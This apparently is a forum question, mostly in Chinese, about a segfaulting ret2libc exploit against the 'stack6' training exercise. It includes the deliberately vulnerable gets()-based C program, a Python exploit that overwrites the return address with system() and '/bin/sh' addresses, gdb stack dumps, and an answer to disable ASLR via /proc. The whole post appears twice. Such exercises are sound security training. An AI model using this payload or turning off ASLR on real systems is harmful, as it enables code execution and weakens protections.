分段错误 ret2libc 攻击
Segmentation Fault ret2libc attack
我正在尝试执行 ret2libc 攻击。
为此，我需要调用 libc 中的 system()，并把“/bin/sh”字符串的地址作为参数传入。不幸的是，我每次都得到 "Segmentation Fault"。
谁能告诉我为什么？我查看了堆栈，（在我看来）一切都正常。
这是我的源代码:
/*
 * Deliberately vulnerable training function (the "stack6" exercise).
 * Reads one line from stdin into a 64-byte stack buffer with gets(),
 * which imposes no length limit, then echoes it back.
 */
void getpath()
{
char buffer[64];
/* 32-bit variable, although the return address on this build is 64-bit
 * (the gdb trace shows 0x00007fff.../0x00005555... values): the pointer is
 * truncated when it is stored here, before the check below runs. */
unsigned int ret;
printf("input path please: "); fflush(stdout);
gets(buffer); /* unbounded read: input longer than 64 bytes overflows into the saved frame */
ret = __builtin_return_address(0);
/* Aborts only when the truncated return address has every bit of 0xbf000000 set
 * (e.g. 0xbfxxxxxx — presumably the stack range of the 32-bit original of this
 * exercise). It is not a bounds check; the real fix is a bounded read such as
 * fgets(buffer, sizeof buffer, stdin). */
if((ret & 0xbf000000) == 0xbf000000) {
printf("bzzzt (%p)\n", ret);
_exit(1);
}
printf("got path %s\n", buffer);
}
/* Program entry point: the exercise consists solely of the getpath() call.
 * argc/argv are accepted but not used. */
int main(int argc, char **argv)
{
	(void)argc;
	(void)argv;
	getpath();
	return 0;
}
我的漏洞利用代码如下:
import struct
# Builds the input for the stack6 exercise and writes it to stdout.
# Python 2 script: a str and the bytes returned by struct.pack() are
# concatenated directly, which Python 3 would reject (str + bytes).
offset = "A"*88  # 88 filler bytes, matching the 0x41414141 run in the gdb dump
system_adress = struct.pack("q",0x7ffff7a60510)  # 8-byte native-order absolute libc address
nop = "\x90"*4
bin_sh_adress = struct.pack("q",0x7ffff7b9b3f3)  # 8-byte native-order absolute libc address
# NOTE: both addresses are hard-coded absolutes and are only stable when ASLR
# is disabled, which the resolution at the end of this page confirms was the cause.
#libc_start = 0x7ffff7a1e000
#sh_offset = 0x17d3f3
#libc_start plus sh_Offset = 0x7ffff7b9b3f3
print(offset + system_adress + nop + bin_sh_adress)
Below are my terminal commands:
>>> r < ./text
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/ExerciseExploit/stack6 < ./text
Breakpoint 2, getpath () at stack6.c:11
11 printf("input path please: "); fflush(stdout);
>>> i r rsp rbp
rsp 0x7fffffffe160 0x7fffffffe160
rbp 0x7fffffffe1b0 0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x00000000 0x00000000 0x00f0b2ff 0x00000000
0x7fffffffe170: 0x000000c2 0x00000000 0xffffe1a6 0x00007fff
0x7fffffffe180: 0x00000001 0x00000000 0xf7abe905 0x00007fff
0x7fffffffe190: 0x00000001 0x00000000 0x5555485d 0x00005555
0x7fffffffe1a0: 0xf7de70e0 0x00007fff 0x00000000 0x00000000
0x7fffffffe1b0: 0xffffe1d0 0x00007fff 0x555547fd 0x00005555
0x7fffffffe1c0: 0xffffe2b8 0x00007fff 0x00000000 0x00000001
0x7fffffffe1d0: 0x55554810 0x00005555 0xf7a3fa87 0x00007fff
0x7fffffffe1e0: 0x00000000 0x00000000 0xffffe2b8 0x00007fff
0x7fffffffe1f0: 0x00040000 0x00000001 0x555547e4 0x00005555
>>> n
input path please: 13 gets(buffer);
>>> n
Breakpoint 1, getpath () at stack6.c:15
15 ret = __builtin_return_address(0);
>>> i r rsp rbp
rsp 0x7fffffffe160 0x7fffffffe160
rbp 0x7fffffffe1b0 0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe170: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe180: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe190: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1a0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1b0: 0x41414141 0x41414141 0xf7a60510 0x00007fff
0x7fffffffe1c0: 0x90909090 0xf7b9b3f3 0x00007fff 0x00000000
0x7fffffffe1d0: 0x55554810 0x00005555 0xf7a3fa87 0x00007fff
0x7fffffffe1e0: 0x00000000 0x00000000 0xffffe2b8 0x00007fff
0x7fffffffe1f0: 0x00040000 0x00000001 0x555547e4 0x00005555
>>> n
17 if((ret & 0xbf000000) == 0xbf000000) {
>>> n
22 printf("got path %s\n", buffer);
>>>
错误报告:
root@kali:~/Desktop/ExerciseExploit# python exploit6.py | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAA���
Segmentation fault
[关闭]
问题已解决：
原因是没有禁用 ASLR。
-> 禁用 ASLR：echo 0 > /proc/sys/kernel/randomize_va_space
我正在尝试执行 ret2libc 攻击。为此，我需要调用 libc 中的 system()，并把“/bin/sh”字符串的地址作为参数传入。不幸的是，我每次都得到 "Segmentation Fault"。
谁能告诉我为什么？我查看了堆栈，（在我看来）一切都正常。
这是我的源代码:
/*
 * Deliberately vulnerable training function (the "stack6" exercise).
 * Reads one line from stdin into a 64-byte stack buffer with gets(),
 * which imposes no length limit, then echoes it back.
 */
void getpath()
{
char buffer[64];
/* 32-bit variable, although the return address on this build is 64-bit
 * (the gdb trace shows 0x00007fff.../0x00005555... values): the pointer is
 * truncated when it is stored here, before the check below runs. */
unsigned int ret;
printf("input path please: "); fflush(stdout);
gets(buffer); /* unbounded read: input longer than 64 bytes overflows into the saved frame */
ret = __builtin_return_address(0);
/* Aborts only when the truncated return address has every bit of 0xbf000000 set
 * (e.g. 0xbfxxxxxx — presumably the stack range of the 32-bit original of this
 * exercise). It is not a bounds check; the real fix is a bounded read such as
 * fgets(buffer, sizeof buffer, stdin). */
if((ret & 0xbf000000) == 0xbf000000) {
printf("bzzzt (%p)\n", ret);
_exit(1);
}
printf("got path %s\n", buffer);
}
/* Program entry point: the exercise consists solely of the getpath() call.
 * argc/argv are accepted but not used. */
int main(int argc, char **argv)
{
	(void)argc;
	(void)argv;
	getpath();
	return 0;
}
我的漏洞利用代码如下:
import struct
# Builds the input for the stack6 exercise and writes it to stdout.
# Python 2 script: a str and the bytes returned by struct.pack() are
# concatenated directly, which Python 3 would reject (str + bytes).
offset = "A"*88  # 88 filler bytes, matching the 0x41414141 run in the gdb dump
system_adress = struct.pack("q",0x7ffff7a60510)  # 8-byte native-order absolute libc address
nop = "\x90"*4
bin_sh_adress = struct.pack("q",0x7ffff7b9b3f3)  # 8-byte native-order absolute libc address
# NOTE: both addresses are hard-coded absolutes and are only stable when ASLR
# is disabled, which the resolution at the end of this page confirms was the cause.
#libc_start = 0x7ffff7a1e000
#sh_offset = 0x17d3f3
#libc_start plus sh_Offset = 0x7ffff7b9b3f3
print(offset + system_adress + nop + bin_sh_adress)
Below are my terminal commands:
>>> r < ./text
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/ExerciseExploit/stack6 < ./text
Breakpoint 2, getpath () at stack6.c:11
11 printf("input path please: "); fflush(stdout);
>>> i r rsp rbp
rsp 0x7fffffffe160 0x7fffffffe160
rbp 0x7fffffffe1b0 0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x00000000 0x00000000 0x00f0b2ff 0x00000000
0x7fffffffe170: 0x000000c2 0x00000000 0xffffe1a6 0x00007fff
0x7fffffffe180: 0x00000001 0x00000000 0xf7abe905 0x00007fff
0x7fffffffe190: 0x00000001 0x00000000 0x5555485d 0x00005555
0x7fffffffe1a0: 0xf7de70e0 0x00007fff 0x00000000 0x00000000
0x7fffffffe1b0: 0xffffe1d0 0x00007fff 0x555547fd 0x00005555
0x7fffffffe1c0: 0xffffe2b8 0x00007fff 0x00000000 0x00000001
0x7fffffffe1d0: 0x55554810 0x00005555 0xf7a3fa87 0x00007fff
0x7fffffffe1e0: 0x00000000 0x00000000 0xffffe2b8 0x00007fff
0x7fffffffe1f0: 0x00040000 0x00000001 0x555547e4 0x00005555
>>> n
input path please: 13 gets(buffer);
>>> n
Breakpoint 1, getpath () at stack6.c:15
15 ret = __builtin_return_address(0);
>>> i r rsp rbp
rsp 0x7fffffffe160 0x7fffffffe160
rbp 0x7fffffffe1b0 0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe170: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe180: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe190: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1a0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1b0: 0x41414141 0x41414141 0xf7a60510 0x00007fff
0x7fffffffe1c0: 0x90909090 0xf7b9b3f3 0x00007fff 0x00000000
0x7fffffffe1d0: 0x55554810 0x00005555 0xf7a3fa87 0x00007fff
0x7fffffffe1e0: 0x00000000 0x00000000 0xffffe2b8 0x00007fff
0x7fffffffe1f0: 0x00040000 0x00000001 0x555547e4 0x00005555
>>> n
17 if((ret & 0xbf000000) == 0xbf000000) {
>>> n
22 printf("got path %s\n", buffer);
>>>
错误报告:
root@kali:~/Desktop/ExerciseExploit# python exploit6.py | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAA���
Segmentation fault
[关闭]
问题已解决：
原因是没有禁用 ASLR。-> 禁用 ASLR：echo 0 > /proc/sys/kernel/randomize_va_space